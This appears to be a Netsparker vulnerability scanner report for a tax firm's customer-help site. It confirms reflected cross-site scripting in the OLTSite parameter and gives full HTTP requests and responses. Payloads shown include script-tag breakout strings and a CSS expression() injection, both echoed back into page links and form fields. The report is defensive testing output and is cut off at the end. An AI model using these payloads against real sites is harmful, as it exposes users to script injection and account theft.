<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Login Failed</title></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><form class="block" action="dummy"><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0002D8)%5C/script%5E&p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0002D8)%5C/script%5E&p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0002D8)%5C/script%5E&p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0002D8)%5C/script%5E&p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect="> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="seltabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="seltabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="seltabbtn" href="acct_login.php?OLTSite=OLTFree73541'"--></style></script><script>netsparker(0x0002D8)</script>&p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect="> &nbsp;&nbsp;Login&nbsp;&nbsp; </a> </td> <td width="1%" class="seltabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="seltabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="seltabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> </tr> </table> </td> <td width="1%">&nbsp;</td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="11"> &nbsp; </td> </tr> <tr><td colspan="10"></td></tr> <tr><td colspan="10"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><tr><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="form" width="100%"><table cellpadding="2" cellspacing="0" border="0" width="100%"><tr><td colspan="2" class=title>&nbsp;Login Failed</td></tr><tr><td colspan="2" class="textcell"><table><tr><td class="textcell">The username and password combination you provided is invalid or your account has been disabled.<p />If you believe you may have mistyped either value, use the browser <b>Back</b> button to return to the login page and try again.<p />If you have forgotten your username or password please visit <a href='acct_assistance.php'>Account Assistance</a> to recover your account credentials.</td></tr></table></td></tr></table></td><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td></tr><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/bl.gif" alt="" /></td><td class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/br.gif" alt="" /></td></tr></table></form><p><table border="0" cellpadding="0" cellspacing="0" width="790" background="https://www.olt.com/main/home/images/back-tiles.gif"> <tr> <td height=17> <div class="foot"> <a href="https://www.olt.com/main/home/default.asp">Home</a> | <a href="https://www.olt.com/main/home/about.asp">About Us</a> | <a href="https://www.olt.com/main/home/payment.asp">Payment Options</a> | <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> | <a href="https://www.olt.com/main/home/states.asp">States</a> | <a href="https://www.olt.com/main/home/getstarted.asp">Get Started</a> | <a href="https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php">Customer Service Live help</a> </div> </td> </tr></table><div class="tiny"> <a href="https://www.olt.com/main/home/privacysecurity.asp">Privacy/Security</a> | <a href="https://www.olt.com/main/home/disclaimer.asp">Disclaimer/Terms Of Use</a> | <a href="https://www.olt.com/main/home/sitemap.asp">Site Map</a> | <a href="https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php">Customer Service Live help</a> <br><br> &copy; On-Line Taxes, Inc.<br> 724 Jules Street<br> St Joseph, MO 64501<br> Ph: 1-816-232-0095 | Fax: 1-816-232-1591 </div></body></html>
- /cgi-bin/olt.cfg/php/enduser/acct_login.php

/cgi-bin/olt.cfg/php/enduser/acct_login.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=%22%20stYle=x:expre/**/s..

Parameters

Parameter Type Value
OLTSite GET " stYle=x:expre/**/ssion(alert(9)) ns="
p_sid GET TyYLtJsk
p_accessibility GET 0
p_redirect GET 3
p_next_page GET acct_login.php

Request

GET /cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=%22%20stYle=x:expre/**/ssion(netsparker(9))%20ns=%22%20&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=3&p_next_page=acct_login.php HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=OLTFree%0073541
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 20:44:33 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Fri, 29-Apr-2011 21:04:33 GMT
RNT-Time: D=67808 t=1304109873831562
RNT-Machine: 10
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2313
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Support Login</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=ruhdAJsk&amp;p_accessibility=1&amp;p_redirect=3">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=ruhdAJsk&amp;p_accessibility=1&amp;p_redirect=3">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=ruhdAJsk&amp;p_accessibility=1&amp;p_redirect=3">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=ruhdAJsk&amp;p_accessibility=1&amp;p_redirect=3">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="10"> &nbsp; </td> </tr> <tr><td colspan="8"></td></tr> <tr><td colspan="8"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><tr><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="form"><table cellpadding="2" cellspacing="2" border="0" width="100%"><!-- Returning Users ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td class="subtitle" colspan="2">Returning Users</td></tr><form class="minimal" name="_validate" method="post" action="acct_login_submit.php"><input type="hidden" name="OLTSite" value="&quot; stYle=x:expre/**/ssion(netsparker(9)) ns=&quot; " /><input type="hidden" name="p_sid" value="ruhdAJsk" /><input type="hidden" name="p_accessibility" value="1" /><input type="hidden" name="p_redirect" value="3" /><input type="hidden" name="p_next_page" value="acct_login.php" /><input type="hidden" name="p_next_page" value="acct_login.php" /><tr><td class="label" align="right" nowrap><label for="p_userid">Username</label>:</td><td><input name="p_userid" id="p_userid" type="text" size="30" maxlength="80" /></td></tr><tr><td class="label" align="right" nowrap><label for="p_passwd">Password</label>:</td><td><input name="p_passwd" id="p_passwd" type="password" size="20" maxlength="20" /></td></tr><tr><td></td><td><input type="submit" value="&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Log In&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;" class="btn" tabindex="0" name="login_btn" /></td></tr></form><!-- Forgotten User ID/Password ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td><font size="-9">&nbsp;</font></td></tr><tr><td class="subtitle" colspan="2">If you forgot your Username or Password...</td></tr><tr><td></td><td><form class="minimal" name="_assist" method="post" action="acct_assistance.php"><input type="hidden" name="p_sid" value="ruhdAJsk" /><input type="hidden" name="p_lva" value="" /><input type="hidden" name="p_sp" value="" /><input type="hidden" name="p_li" value="" /><input type="hidden" name="p_accessibility" value="1" /><input type="hidden" name="p_redirect" value="3" /><input type="submit" value="Go To Account Assistance" class="btn" tabindex="0" name="email_passwd_btn" /></td></tr></form><!-- New Users ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td><font size="-9">&nbsp;</font></td></tr><tr><td class="subtitle" colspan="2">If you do not have an account...</td></tr><tr><td></td><td><form class="minimal" name="_new" method="post" action="acct_new.php"><input type="hidden" name="p_sid" value="ruhdAJsk" /><input type="hidden" name="p_lva" value="" /><input type="hidden" name="p_sp" value="" /><input type="hidden" name="p_li" value="" /><input type="hidden" name="p_next_page" value="acct_login.php" /><input type="hidden" name="p_accessibility" value="1" /><input type="hidden" name="p_redirect" value="3" /><input type="submit" value="Create a New Account" class="btn" tabindex="0" name="create_acct_btn" /></td></tr></form></table></td><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td></tr><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/bl.gif" alt="" /></td><td class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/br.gif" alt="" /></td></tr></table><br /><p><table border="0" cellpadding="0" cellspacing="0" width="790" background="https://www.olt.com/main/home/images/back-tiles.gif"> <tr> <td height=17> <div class="foot"> <a href="https://www.olt.com/main/home/default.asp">Home</a> | <a href="https://www.olt.com/main/home/about.asp">About Us</a> | <a href="https://www.olt.com/main/home/payment.asp">Payment Options</a> | <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> | <a href="https://www.olt.com/main/home/states.asp">States</a> | <a href="https://www.olt.com/main/home/getstarted.asp">Get Started</a> | <a href="https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php">Customer Service Live help</a> </div> </td> </tr></table><div class="tiny"> <a href="https://www.olt.com/main/home/privacysecurity.asp">Privacy/Security</a> | <a href="https://www.olt.com/main/home/disclaimer.asp">Disclaimer/Terms Of Use</a> | <a href="https://www.olt.com/main/home/sitemap.asp">Site Map</a> | <a href="https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php">Customer Service Live help</a> <br><br> &copy; On-Line Taxes, Inc.<br> 724 Jules Street<br> St Joseph, MO 64501<br> Ph: 1-816-232-0095 | Fax: 1-816-232-1591 </div><script type="text/javascript">_set_cursor();</script></body></html>
- /cgi-bin/olt.cfg/php/enduser/help_general.php

/cgi-bin/olt.cfg/php/enduser/help_general.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/help_general.php?OLTSite=OLTFree%0073541%00%27%..

Parameters

Parameter Type Value
OLTSite GET OLTFree73541'"--></style></script><script>alert(0x000503)</script>
p_sid GET TyYLtJsk
p_accessibility GET 0
p_redirect GET 3

Request

GET /cgi-bin/olt.cfg/php/enduser/help_general.php?OLTSite=OLTFree%0073541%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000503)%3C%2Fscript%3E&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=3 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/ask.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:51:00 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=74174 t=1304117460035867
RNT-Machine: 05
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4020
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Support Help</title></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x000503)%5C/script%5E&p_sid=Wm6S1Ksk&amp;p_accessibility=1&amp;p_redirect=3">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x000503)%5C/script%5E&p_sid=Wm6S1Ksk&amp;p_accessibility=1&amp;p_redirect=3">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x000503)%5C/script%5E&p_sid=Wm6S1Ksk&amp;p_accessibility=1&amp;p_redirect=3">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img 